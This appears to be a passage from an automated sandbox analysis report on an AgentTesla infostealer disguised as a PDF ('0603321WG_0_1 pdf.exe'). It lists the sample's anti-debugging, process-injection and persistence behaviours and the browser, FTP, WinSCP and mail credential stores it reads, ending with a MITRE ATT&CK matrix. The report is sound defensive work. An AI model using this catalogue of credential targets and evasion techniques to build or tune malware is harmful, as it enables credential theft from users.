                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 6880Thread sleep time: -19369081277395017s >= -30000s
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 6868Thread sleep count: 1055 > 30
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 6868Thread sleep count: 8763 > 30
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 6880Thread sleep count: 40 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 1380Thread sleep count: 1055 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 1380Thread sleep count: 2255 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 7048Thread sleep count: 1512 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 7048Thread sleep count: 1798 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 7048Thread sleep count: 1776 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 4532Thread sleep time: -26747778906878833s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 1292Thread sleep count: 3515 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 1292Thread sleep count: 6313 > 30
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: WerFault.exe, 00000020.00000002.884157462.000000000514C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW~R]-
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.683795735.0000000005150000.00000002.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.920216690.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.701811832.00000000051A0000.00000002.00000001.sdmp, NewApp.exe, 0000000F.00000002.860689934.0000000005840000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.861641127.0000000004AE0000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.915125012.0000000006340000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.900651409.0000000004F00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: WerFault.exe, 0000000A.00000003.699166386.0000000004BF0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.895985393.00000000009D5000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000002.884157462.000000000514C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.683795735.0000000005150000.00000002.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.920216690.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.701811832.00000000051A0000.00000002.00000001.sdmp, NewApp.exe, 0000000F.00000002.860689934.0000000005840000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.861641127.0000000004AE0000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.915125012.0000000006340000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.900651409.0000000004F00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.683795735.0000000005150000.00000002.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.920216690.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.701811832.00000000051A0000.00000002.00000001.sdmp, NewApp.exe, 0000000F.00000002.860689934.0000000005840000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.861641127.0000000004AE0000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.915125012.0000000006340000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.900651409.0000000004F00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.923725606.0000000005F10000.00000004.00000001.sdmp, NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: WerFault.exe, 0000000A.00000002.701355263.0000000004B74000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW e
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.683795735.0000000005150000.00000002.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.920216690.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.701811832.00000000051A0000.00000002.00000001.sdmp, NewApp.exe, 0000000F.00000002.860689934.0000000005840000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.861641127.0000000004AE0000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.915125012.0000000006340000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.900651409.0000000004F00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      barindex
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_00E90A76 KiUserExceptionDispatcher,WaitForSingleObjectEx,IsWindowArranged,GetGeoInfoW,SetThreadDpiAwarenessContext,KiUserExceptionDispatcher,KiUserExceptionDispatcher,BuildReasonArray,GetPrivateProfileStringA,RecordShutdownReason,GlobalSize,EnableOneCoreTransformMode,GlobalSize,SetFileInformationByHandle,GlobalSize,GlobalSize,EnumDisplayMonitors,GlobalSize,LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeMemory written: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeMemory written: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeMemory written: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess created: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912647673.0000000001420000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.912290547.0000000001C30000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912647673.0000000001420000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.912290547.0000000001C30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912647673.0000000001420000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.912290547.0000000001C30000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912647673.0000000001420000.00000002.00000001.sdmp, NewApp.exe, 0000001B.00000002.912290547.0000000001C30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000000F.00000002.850762818.00000000050CD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.879172967.00000000064E4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.806272942.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.909001517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.679176630.00000000047A2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.909029563.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.883671585.0000000006979000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 4972, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 7056, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 5552, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 0603321WG_0_1 pdf.exe PID: 7004, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 0603321WG_0_1 pdf.exe PID: 4500, type: MEMORY
                      Source: Yara matchFile source: 0.2.0603321WG_0_1 pdf.exe.47a2af0.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.650ce20.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.0603321WG_0_1 pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.0603321WG_0_1 pdf.exe.47d8910.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.6979bd8.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.NewApp.exe.51039d0.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.0603321WG_0_1 pdf.exe.47a2af0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.650ce20.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.6979bd8.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.NewApp.exe.51039d0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.NewApp.exe.50cdbb0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.0603321WG_0_1 pdf.exe.47d8910.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.NewApp.exe.50cdbb0.8.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara matchFile source: 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 5552, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 0603321WG_0_1 pdf.exe PID: 4500, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000000F.00000002.850762818.00000000050CD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.879172967.00000000064E4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.806272942.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.909001517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.679176630.00000000047A2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.909029563.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.883671585.0000000006979000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 4972, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 7056, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 5552, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 0603321WG_0_1 pdf.exe PID: 7004, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 0603321WG_0_1 pdf.exe PID: 4500, type: MEMORY
                      Source: Yara matchFile source: 0.2.0603321WG_0_1 pdf.exe.47a2af0.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.650ce20.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.0603321WG_0_1 pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.0603321WG_0_1 pdf.exe.47d8910.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.6979bd8.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.NewApp.exe.51039d0.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.0603321WG_0_1 pdf.exe.47a2af0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.650ce20.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.6979bd8.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.NewApp.exe.51039d0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.NewApp.exe.50cdbb0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.0603321WG_0_1 pdf.exe.47d8910.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.NewApp.exe.50cdbb0.8.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
